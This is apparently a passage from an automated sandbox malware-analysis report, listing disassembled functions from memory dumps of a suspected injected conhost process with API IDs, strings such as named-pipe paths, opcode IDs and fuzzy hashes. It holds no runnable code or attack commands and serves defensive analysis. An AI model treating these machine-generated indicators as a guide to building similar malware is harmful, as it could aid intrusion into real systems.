                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                  • Instruction ID: 2ba69fc81f8d1a7efd74922c803878e5f534b4e53b088e33000da47cd330a2cd
                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                  • Instruction Fuzzy Hash: 6FF0903130070183FA109B74A8D43A93330EB897A6F948619DA7A455E6CF2CC868E300
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: CombinePath
                                  • String ID: \\.\pipe\
                                  • API String ID: 3422762182-91387939
                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction ID: 4dd9876b67fb66ffe7030ac637560582cf87d021883f419459b7d3cbd3f236a4
                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction Fuzzy Hash: 0FF05E74304B80C3FA548B22B994399B271AB48FD2F85C030EE0A47B1ACF68C4669700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID:
                                  • API String ID: 2882836952-0
                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                  • Instruction ID: b0278c8bbeff3a9097095d0c2d50857d3d2d891ba2264f3e07030325f09aaa59
                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                  • Instruction Fuzzy Hash: 1B02BA32619B8487EBA0CB65F49439AB7B0F3C5794F108515EA8E87BA9DF7CC494DB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                  • Instruction ID: 8f425c4760230b8c8f10896b501adcd845f0fd49da0b5628d8844cbc2096daa7
                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                  • Instruction Fuzzy Hash: 4B518D3660460187E768CF26E484B9AF3B4F788B95F50C129DE4A43B96DF38CD65EB40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                  • Instruction ID: 8456aa404c774c0ce7be695777772141b0c3f8dde9f30acb09dc1ae5f30099b6
                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                  • Instruction Fuzzy Hash: 3B51C2366146118BE768CF36A8C07AAF3B0F389B94F508119DE4A43B56DF38CC65EB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID:
                                  • API String ID: 2882836952-0
                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                  • Instruction ID: 7c386e532fd6983e1499a13ab14bc231aabfa423f46f7af91cbe00d15f689779
                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                  • Instruction Fuzzy Hash: DC61B536529A4487EBA0CB25E49439AB7F0F389754F108515EB8D87BAADF7CC960DB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                  • String ID:
                                  • API String ID: 1092925422-0
                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                  • Instruction ID: 12eb9393d36c1c82e993ab5efa59fe6913471b98c92cea11a93e472aae6ad46e
                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                  • Instruction Fuzzy Hash: 2A112B3660574093FB648F71E48439AB7B0FB44B90F048126DA4D037A9EF7DCAA4E784
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2395640692-1018135373
                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction ID: 0a59dee83ef76972b153bf68bdff444e980a9e13dcc64f490f6e8dc391468399
                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction Fuzzy Hash: A151B132311A008BEB54DF35E488BAD77B2F754B98F55C225EA4A4778ADF78C8A1D700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction ID: 4d7fa3ff1c55e7d11edecb0dbff43d458775668bfaf2115de031d1ef62969744
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: 3C617D72508BC486EB719F25E4807DAB7B0F795B98F048215EB9817B9ADF7CC1A4CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction ID: ed3e1f076fc794b0d4bedb828b7ad1e032aab119227b77dbf7757d7c321e2834
                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction Fuzzy Hash: 51516B322006808BEB748F36958439877F1F3A4B94F15C116DA9A47BD6CF38C871EB81
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction ID: b75eac124a33b474eed7283a55608b0d633c6a2747dc3a7694d2ff655d208241
                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction Fuzzy Hash: 4A51593A204680CBEF749F66E54439877A0FB54B94F188116DF9967BD6CFB8C8A0CB01
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                  • String ID: pid_
                                  • API String ID: 517849248-4147670505
                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                  • Instruction ID: 233a89adcb7caedc3f1094f6f9f0ea54760a9c961a63ed657bc5fbb05b573c0e
                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                  • Instruction Fuzzy Hash: B7119031310B81A3FB609B35E8C53DA73B4F788781F808525AE4DC3696EF68C925E740
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                  • String ID:
                                  • API String ID: 2718003287-0
                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                  • Instruction ID: 1c93df4d6d6ad14a80e251e24f09266ac414c054c0cd4a6b966a82b71e62c454
                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                  • Instruction Fuzzy Hash: F4D19632B14A848AE715DFB9E4803EC77B1E354B99F408216DE5EA7B9ADB34C126D340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free
                                  • String ID:
                                  • API String ID: 3168794593-0
                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                  • Instruction ID: dc34c2d1bafdbc337168bd19e30c4f2fd19839b9c20b03aed3ebf615c8f26c58
                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                  • Instruction Fuzzy Hash: 97016532610B80DBE755DF66E88468977B0F788F96B0A8025DF4943729DF38D0A1C740
                                  APIs
                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001B4449128DF), ref: 000001B444912A12
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: ConsoleMode
                                  • String ID:
                                  • API String ID: 4145635619-0
                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                  • Instruction ID: bfd8b86fbcb29e86e32dfb92e64d714f680631888555c4906467a73b2609835b
                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                  • Instruction Fuzzy Hash: 0991FF327106548AFB68EF7594D07EDBBB0F345B99F44810ADE4A63A86DF34C4A6E300
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID: \\.\pipe\
                                  • API String ID: 3081899298-91387939
                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                  • Instruction ID: 18fd61f098f2acc001e682e0c21f882e1c0543038f2da1e051d9740efd933a0c
                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                  • Instruction Fuzzy Hash: 5871B236204B8147EB79DE36A9C43EAB7B4F385B84F508016DD4A53B8ADF35CA20E740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 3242871069-1018135373
                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction ID: 43d9f1e0f9c52bcebd4199a47ce63a48eb9ac4625a3a36bde71eed85cd819832
                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction Fuzzy Hash: DB51B03A311E088BEF54CB15E448BAC33A1FB44B98F15C525EA4A577CAEFB8C861C710
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd
                                  Similarity
                                  • API ID: CallTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3163161869-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction ID: c273f95c1d4dd572484496cb5dd539a97e22d3b6e29a4f318f1dec697bd60054
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: 6061B376508BC486EB719F55E4407DAB7A0FB85B88F048615EB9827BD6DFBCC1A4CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID: \\.\pipe\
                                  • API String ID: 3081899298-91387939
                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                  • Instruction ID: 7aba8c29a8fa8317b458f918913602b582cb017f8d2b8e472824f08dcc8214e1
                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                  • Instruction Fuzzy Hash: E951E73620478183EA68DE3AA4D43EAB7B5F3D5B80F548025DE5943B8BDF35D824E740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: U
                                  • API String ID: 442123175-4171548499
                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                  • Instruction ID: 85fa521bdd48d441a0ca00196e9b8b459b6bf834f673fe7b144f1b4f579e199b
                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                  • Instruction Fuzzy Hash: 5241D032625A8087FB60DF75E4847DAB7B0F388795F848122EA8D87799EF38C451DB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: ExceptionFileHeaderRaise
                                  • String ID: csm
                                  • API String ID: 2573137834-1018135373
                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                  • Instruction ID: 74c18a965068b58da594729a1038fa22c07c6f59e6fecfb0394c57f37888184d
                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                  • Instruction Fuzzy Hash: BC112B32214B8082EB618B25F484399B7F5F788B94F588224EF8D07B66DF3CC561CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocFree
                                  • String ID:
                                  • API String ID: 756756679-0
                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                  • Instruction ID: baf88d9b3d119753d2ff4592d1f21a3dba521a6d3ef9bedb10f77628f3352576
                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                  • Instruction Fuzzy Hash: BB11C031A01B80C2EA55CF76A88529977B1F788FD5F598028DE4E57726EF39C492D300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
